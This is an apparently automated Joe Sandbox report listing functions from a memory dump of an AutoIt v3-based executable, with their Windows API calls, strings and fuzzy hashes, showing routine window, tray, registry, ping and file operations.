Part of subcall function 00213740: CharUpperBuffW.USER32(?,002C71DC,00000000,?,00000000,002C71DC,?,002053A5,?,?,?,?), ref: 0021375D

_memmove.LIBCMT ref: 0020B68A

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: b7ea4fa5d42edeb2a1c7f90e4b638e8f4da1cb9e3b96abef8c753eb18a91bdf8
Instruction ID: 7e7f5f307e462d772f0a76dc586d396278e9394e3384e103827a7cf70db34ee1
Opcode Fuzzy Hash: b7ea4fa5d42edeb2a1c7f90e4b638e8f4da1cb9e3b96abef8c753eb18a91bdf8
Instruction Fuzzy Hash: 11A28A716283429FD725DF14C480B2AB7E1BF88304F14895DE89A8B3A2D771ED65CF92

Function 0026494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0024FC86), ref: 0026495A
FindFirstFileW.KERNEL32(?,?), ref: 0026496B
FindClose.KERNEL32(00000000), ref: 0026497B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 1d2b77d946d4713fa0b485629875a4ae3ee6906ef287ed31f3f48f1a408608e6
Instruction ID: d737e8aef4500f31ea8e92d705317f39c0c588765806c34e8c124836456e7c92
Opcode Fuzzy Hash: 1d2b77d946d4713fa0b485629875a4ae3ee6906ef287ed31f3f48f1a408608e6
Instruction Fuzzy Hash: 27E0D8318615099F42107B38FC4D8EA775CDE06335F100B16F975C10D0E77099944695

Function 002094E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362d15aa3dd4380f2fcecae1e9aaea1475375a97e53110d71cfbff8fada61e5a
Instruction ID: 0fd428eed0b01ead6a61871cb5fa48476ed7169f2a4c780ba9e6b781358a1e92
Opcode Fuzzy Hash: 362d15aa3dd4380f2fcecae1e9aaea1475375a97e53110d71cfbff8fada61e5a
Instruction Fuzzy Hash: 6E22BD7092031ADFDB14DF54C880AAEB7B4FF45300F148169E84AAB393E771A9A5CF91

Function 0020BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0020BF57

Part of subcall function 002052B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002052E6

Sleep.KERNEL32(0000000A,?,?), ref: 002436B5

Strings

@TRAY_ID, xrefs: 00243FCD
@GUI_CTRLHANDLE, xrefs: 00243816
@GUI_WINHANDLE, xrefs: 002437C1
CALL, xrefs: 0020C277
@GUI_CTRLID, xrefs: 0024376C
@COM_EVENTOBJ, xrefs: 00243D2E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: 60415251c7423ee26c14e244165f36447dbe8aff6e331aa882b04de63ac680c5
Instruction ID: 6f19ad9347c51a654d6287bff0774d3a35aa1adaf5cce71ab6f7120ce659cc73
Opcode Fuzzy Hash: 60415251c7423ee26c14e244165f36447dbe8aff6e331aa882b04de63ac680c5
Instruction Fuzzy Hash: 46C2A270628342DFD729DF24C884BAAB7E5BF94304F14491DF58A97292CB71E964CF82

Function 002033E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00203444
RegisterClassExW.USER32(00000030), ref: 0020346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0020347F
InitCommonControlsEx.COMCTL32(?), ref: 0020349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002034AC
LoadIconW.USER32(000000A9), ref: 002034C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002034D1

Strings

TaskbarCreated, xrefs: 00203474
+, xrefs: 0020342D
0, xrefs: 00203426
AutoIt v3 GUI, xrefs: 00203460

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 0811a78341b6ce1bd68869ee96eefe88b5d27fafab922cdbd53fc2d6d4fd18e8
Instruction ID: faa70af9c747f9f162d8dc385343d94820b256e4139ba2763b8ca48cac74a688
Opcode Fuzzy Hash: 0811a78341b6ce1bd68869ee96eefe88b5d27fafab922cdbd53fc2d6d4fd18e8
Instruction Fuzzy Hash: A13125B1844309EFDB518FA4EC8DAC9BBF0FF09320F10425AE690A62A0D7B91591CF91

Function 00203411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00203444
RegisterClassExW.USER32(00000030), ref: 0020346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0020347F
InitCommonControlsEx.COMCTL32(?), ref: 0020349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002034AC
LoadIconW.USER32(000000A9), ref: 002034C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002034D1

Strings

TaskbarCreated, xrefs: 00203474
+, xrefs: 0020342D
0, xrefs: 00203426
AutoIt v3 GUI, xrefs: 00203460

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 956ec4c8da3f88c8af9bce8b648f8a6fd7bc543bed9256d17822a53b5fee8a59
Instruction ID: 45f70fae6115086cab0df43a25cd66145c2ca97f47a93983dc7841a3eb5348e8
Opcode Fuzzy Hash: 956ec4c8da3f88c8af9bce8b648f8a6fd7bc543bed9256d17822a53b5fee8a59
Instruction Fuzzy Hash: 8F21DEB191420CAFEB409FA4EC8DBDDBBB8FB08710F00421AFA10A62A0D7B11550DF91

Function 00212FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002200CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00213094), ref: 002200ED

Part of subcall function 002208C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0021309F), ref: 002208E3

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002130E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002501BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002501FB
RegCloseKey.ADVAPI32(?), ref: 00250239
_wcscat.LIBCMT ref: 00250292

Strings

Include, xrefs: 002501B1, 002501F2
\, xrefs: 002502B5
Software\AutoIt v3\AutoIt, xrefs: 002130D8
\Include\, xrefs: 0021309F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: e55eaae14b4bbfa953334d7e53f14f23212178fbef237636aa426301a11db688
Instruction ID: ae8ff66cf222b90f2fc13bf310ea40625b0dbea19277556059ccd4fd756e89e7
Opcode Fuzzy Hash: e55eaae14b4bbfa953334d7e53f14f23212178fbef237636aa426301a11db688
Instruction Fuzzy Hash: CA718A71425741AEC300EF65EC89DABBBE8FF58340F40452EF945C21A0EF3099A8CB56

Function 0021514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00215156
LoadCursorW.USER32(00000000,00007F00), ref: 00215165
LoadIconW.USER32(00000063), ref: 0021517C
LoadIconW.USER32(000000A4), ref: 0021518E
LoadIconW.USER32(000000A2), ref: 002151A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002151C6
RegisterClassExW.USER32(?), ref: 0021521C

Part of subcall function 00203411: GetSysColorBrush.USER32(0000000F), ref: 00203444
Part of subcall function 00203411: RegisterClassExW.USER32(00000030), ref: 0020346E
Part of subcall function 00203411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0020347F
Part of subcall function 00203411: InitCommonControlsEx.COMCTL32(?), ref: 0020349C
Part of subcall function 00203411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002034AC
Part of subcall function 00203411: LoadIconW.USER32(000000A9), ref: 002034C2
Part of subcall function 00203411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002034D1

Strings

#, xrefs: 00215201
0, xrefs: 002151FA
AutoIt v3, xrefs: 0021520B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 378e883b74c2d97f6aa46846f4efc72763c18866851d5f3d6f11c742994c9376
Instruction ID: 21714a637f3c82729a44606beaf3b112069aff9a38d2bcc6230ac007a33aa813
Opcode Fuzzy Hash: 378e883b74c2d97f6aa46846f4efc72763c18866851d5f3d6f11c742994c9376
Instruction Fuzzy Hash: DF214671D14308AFEB109FA9FD4DF9DBBB4FB18720F00415AFA04A62A0D7B659508F86

Function 00275E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00275E7E
inet_addr.WSOCK32(?,?,?), ref: 00275EC3
gethostbyname.WS2_32(?), ref: 00275ECF
IcmpCreateFile.IPHLPAPI ref: 00275EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00275F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00275F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00275FD8
WSACleanup.WSOCK32 ref: 00275FDE

Strings

Ping, xrefs: 00275F01

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 2d8df18fff466b6f350f7b0d443a5bb87473ce61c4db70364d7431a05608bf59
Instruction ID: 1e12ac339e96a19b6af28f30004ba7c1dfbc300d1da0943cb1de307542762b7b
Opcode Fuzzy Hash: 2d8df18fff466b6f350f7b0d443a5bb87473ce61c4db70364d7431a05608bf59
Instruction Fuzzy Hash: 7851AF316247119FD720EF25DC89B2AB7E4EF49710F14852AF959DB2A1DBB0E920CF42

Function 00214D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00214E22
KillTimer.USER32(?,00000001), ref: 00214E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00214E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00214E7A
CreatePopupMenu.USER32 ref: 00214E8E
PostQuitMessage.USER32(00000000), ref: 00214EAF

Strings

TaskbarCreated, xrefs: 00214E75

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 4131b78f783fb5cc7ea7b2a2a8cde9a3274e9b95fc71c2c692679e314b529cb7
Instruction ID: a2661897458bc1b7439206e7f263170763f38da55cb944893a2eff243c93019b
Opcode Fuzzy Hash: 4131b78f783fb5cc7ea7b2a2a8cde9a3274e9b95fc71c2c692679e314b529cb7
Instruction Fuzzy Hash: DE41F93127820AABDB157F64AC4DFFA76D5FB60711F000619F905921A2CBB19CB0DBA2

Function 002156F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00250C5B

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

_memset.LIBCMT ref: 00215787
_wcscpy.LIBCMT ref: 002157DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002157EB
__swprintf.LIBCMT ref: 00250CD1

Strings

Line %d: , xrefs: 00250CCB
AutoIt - , xrefs: 00215760

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt -
API String ID: 230667853-4094128768
Opcode ID: a98648ec8e248ecdf95c9956a4d301bcaba4637d625ddee9894f0fc61dd25eda
Instruction ID: e2a22aabe4ea241b7b5eb2ce6f7606eefb7234a0cae17ca1a48d2ead454b2187
Opcode Fuzzy Hash: a98648ec8e248ecdf95c9956a4d301bcaba4637d625ddee9894f0fc61dd25eda
Instruction Fuzzy Hash: CE41A471028315AAD321EB60DC89EDF77DCAFA4350F10061EF595920A1DB7096A9CF97

Function 002150DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00215109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0021512A
ShowWindow.USER32(00000000), ref: 0021513E
ShowWindow.USER32(00000000), ref: 00215147

Strings

edit, xrefs: 00215124
AutoIt v3, xrefs: 00215101, 00215106, 00215107

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 70df845164001be94552d204a664aaa3328d2176750c5c1c8fb72e2960db7062
Instruction ID: 17c6bebf23895d56eec9e4ac798267e8474c2279d1cc0dc67872c830851fa7ef
Opcode Fuzzy Hash: 70df845164001be94552d204a664aaa3328d2176750c5c1c8fb72e2960db7062
Instruction Fuzzy Hash: BDF0DA715852947EFA311767BC8CE676E7DD7C6F60F00011EBE00A21B0C6751851DEB1

Function 00269B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00214A8C: _fseek.LIBCMT ref: 00214AA4

Part of subcall function 00269CF1: _wcscmp.LIBCMT ref: 00269DE1
Part of subcall function 00269CF1: _wcscmp.LIBCMT ref: 00269DF4

_free.LIBCMT ref: 00269C5F
_free.LIBCMT ref: 00269C66
_free.LIBCMT ref: 00269CD1

Part of subcall function 00222F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00229C54,00000000,00228D5D,002259C3), ref: 00222F99
Part of subcall function 00222F85: GetLastError.KERNEL32(00000000,?,00229C54,00000000,00228D5D,002259C3), ref: 00222FAB

_free.LIBCMT ref: 00269CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00269B8F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: 38f504fe0de4b2708d2a02c47db5f5b3ecf356c79ebb03ac8744bc794196d719
Instruction ID: 50753a50bdf89042afccf23844891b49517b2a806e7441b2279c1f5848891dd7
Opcode Fuzzy Hash: 38f504fe0de4b2708d2a02c47db5f5b3ecf356c79ebb03ac8744bc794196d719
Instruction Fuzzy Hash: AC514CB1914229AFDF24DFA4DC41AAEBBB9FF48304F10049EB249A3241DB715AD4CF59

Function 0022563D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0022569B
_memcpy_s.LIBCMT ref: 0022570D
__read_nolock.LIBCMT ref: 0022576B
__filbuf.LIBCMT ref: 0022578E
_memset.LIBCMT ref: 002257D2

Part of subcall function 00228D58: __getptd_noexit.LIBCMT ref: 00228D58

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: 096ebfb52046c5f6208aac1bde060fcb157ad3e129e99a32b99a064302eccdbd
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: 2151A730A20B36FBDB248EE9A88466EB7B5AF40320F64C729F835961D0D7749D709F40

Function 002052B0 Relevance: 7.6, APIs: 5, Instructions: 99
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002052E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0020534A
TranslateMessage.USER32(?), ref: 00205356
DispatchMessageW.USER32(?), ref: 00205360

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: b7693c85ef8f0ce8ab184960bd89db8aacea5a06a56f1848edd7d7771c105927
Instruction ID: 0bed8c766540257c75041a90e883bc53a1c1c253f3e34f6267549147a057e3d7
Opcode Fuzzy Hash: b7693c85ef8f0ce8ab184960bd89db8aacea5a06a56f1848edd7d7771c105927
Instruction Fuzzy Hash: 2331F67092470A9FDB308F64AC88FAB77E8AF01340F24019AE512861E2D7F59865DF11

Function 0020ABF7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100comCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0020AD08
OleInitialize.OLE32(00000000), ref: 0020AD85

Strings

<w,, xrefs: 0020AC6B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

